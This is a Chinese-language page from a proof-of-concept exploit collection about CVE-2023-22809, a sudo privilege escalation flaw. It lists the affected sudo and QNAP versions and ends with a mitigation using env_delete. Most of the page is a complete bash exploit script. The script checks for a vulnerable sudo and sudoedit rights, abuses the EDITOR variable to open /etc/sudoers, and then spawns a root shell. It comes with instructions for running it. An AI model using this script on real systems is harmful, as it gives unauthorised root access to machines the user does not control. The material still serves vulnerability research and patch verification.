admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/操作系统漏洞/Linux sudo权限提升漏洞 CVE-2023-22809.md
Threekiii 38596b68ff 更新README.md
2023-06-01 17:24:55 +08:00

90 lines
2.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Linux Sudo权限提升漏洞 CVE-2023-22809
## 漏洞描述
Sudo 存在权限提升漏洞,攻击者可过特定的 payload 获取服务器 root 权限。
Sudo 中的 sudoedit 对处理用户提供的环境变量(如`SUDO_EDITOR``VISUAL``EDITOR`)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过 sudoers 策略的 " " 参数时拥有sudoedit 访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。该漏洞还影响部分 QNAP 操作系统QTS、QuTS hero、QuTScloud、QVPQVR Pro 设备)。
## 漏洞影响
```
Sudo:
1.8.0~1.9.12p1 均受影响
QTS 与 QuTS hero
QTS < 5.0.1.2346 build 20230322
QuTS < hero h5.0.1.2348 build 20230324
```
## 漏洞复现
exp.sh
```
#!/usr/bin/env bash
#
# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
#
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Running this exploit on a vulnerable system allows a localiattacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then
echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
fi
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0
```
查看本地 sudo 版本:
```
sudo -V
```
执行文件:
```
./exp.sh
```
## 修复建议
使用 sudoedit 时,将受影响的环境变量添加到 env_delete 拒绝列表中,例如:
```
Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
Cmnd_Alias SUDOEDIT = sudoedit /etc/custom/service.conf
user ALL=(ALL:ALL) SUDOEDIT
```
Reference in New Issue View Git Blame Copy Permalink